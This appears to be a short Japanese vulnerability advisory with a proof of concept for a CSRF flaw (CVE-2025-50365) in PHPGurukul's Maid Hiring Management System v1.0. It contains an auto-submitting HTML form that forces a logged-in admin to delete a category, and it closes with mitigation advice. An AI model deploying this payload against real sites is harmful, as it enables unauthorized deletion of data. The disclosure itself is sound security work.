
PoC for CVE-2025-50365: PHPGurukul Maid Hiring Management System における CSRF 脆弱性。細工された管理者リクエストを介して、採用カテゴリの削除を可能にします。
プロジェクト名とリポジトリURL: Maid Hiring Management System using PHP and MySQL
脆弱性タイプ: クライアントサイドリクエストフォージェリ
影響を受けるバージョン: v1.0
💣脆弱性説明: PHPGurukul採用管理システムの管理パネルにクロスサイトリクエストフォージェリ (CSRF) の脆弱性が存在します。攻撃者は認証済み管理者を悪意のあるサイトにアクセスさせることで、任意の採用カテゴリを削除できます。これにより、データの削除や管理者権限での不正な変更が発生する可能性があります。
👩💻影響: 不正なカテゴリ削除。
🛜概念実証 (PoC):

/admin/manage-category.php にGETリクエストを送信するHTMLコード
CSRF-POC<html>
<body>
<form action="http://127.0.0.1/mhms/admin/manage-category.php">
<input type="hidden" name="delid" value="13" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>


推奨事項: 管理フォームにCSRFトークンを実装し、SameSiteクッキーを強制し、リクエストの発信元を検証して不正な操作を防止します。